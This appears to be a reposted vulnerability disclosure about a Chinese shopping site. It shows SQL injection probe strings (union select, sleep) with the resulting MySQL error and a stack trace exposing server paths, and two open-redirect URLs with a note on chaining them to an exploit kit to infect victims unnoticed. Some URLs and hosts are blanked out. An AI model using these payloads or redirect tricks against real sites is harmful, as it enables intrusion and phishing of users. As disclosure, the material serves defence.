Possible SQL注射BUG is found here:
+union+select+1,2,+--
+sleep(1)%23
Accessing that url and you will see the following error:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1,2, --;#sqlEye::+unio' at line 1
#0 /www/goods/library/Zend/Db/Statement.php(320): Zend_Db_Statement_Pdo->_execute(Array)
#1 /www/goods/library/Zend/Db/Adapter/Abstract.php(481): Zend_Db_Statement->execute(Array)
#2 /www/goods/library/Zend/Db/Adapter/Pdo/Abstract.php(238): Zend_Db_Adapter_Abstract->query('select cat_id,c...', Array)
#3 /www/goods/library/Zend/Db/Adapter/Abstract.php(738): Zend_Db_Adapter_Pdo_Abstract->query('select cat_id,c...', Array)
#4 /www/goods/application/default/models/SeoModel.php(37): Zend_Db_Adapter_Abstract->fetchAll('select cat_id,c...')
#5 /www/goods/application/default/models/SeoModel.php(62): SeoModel->seo_search_lists(' union select 1...')
#6 /www/goods/application/default/controllers/ListgoodsController.php(30): SeoModel->seo_TDK(' union select 1...', NULL, NULL, Array)
#7 /www/goods/library/Zend/Controller/Action.php(513): ListgoodsController->indexAction()
#8 /www/goods/library/Zend/Controller/Dispatcher/Standard.php(295): Zend_Controller_Action->dispatch('indexAction')
#9 /www/goods/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http))
#10 /www/goods/html/bootstrap.php(102): Zend_Controller_Front->dispatch()
#11 /www/goods/html/bootstrap.php(31): Application->dispatch()
#12 /www/goods/html/index.php(75): Application->__construct(Array)
#13 {main}
Severity: URL Redirection bug
Confidence: Confident
Host:
Path: /pageview/pos?app=from_tag&url=http://www.jiapin.com/list/14565.html
Issue detail:
This is considered quite serious if it's in a consumer type of website as attackers can make use of this to redirect victims to another website.
Ok, the flaw is that the original url will look like the following
?app=from_tag&url=http://www.jiapin.com/list/14565.html
However, an attacker can change the final url to the following
user.jiapin.com/pageview/pos?app=from_tag&url=http://ebay.de
If attackers have exploit kit, they can redirect victims to their website, fire up an iframe showing the original content from jiapin.com
After they had exploited or trojanised the victim, just do another redirect to the original website.
This way, victims will not notice much. :D In my test case, i redirect user(s) to ebay.de :D
The other URL Redirection bug could be found here:
?url_t=http://news.jiapin.com/html/zx/jiapinguandi/2012/0822/6690.html
Similarly, if you replace
with and the final url look like this:
?url_t=http://ebay.de
Victims will be redirected to eBay.de instead
Or the image below
,www.xuhantao.com,涛涛电脑知识网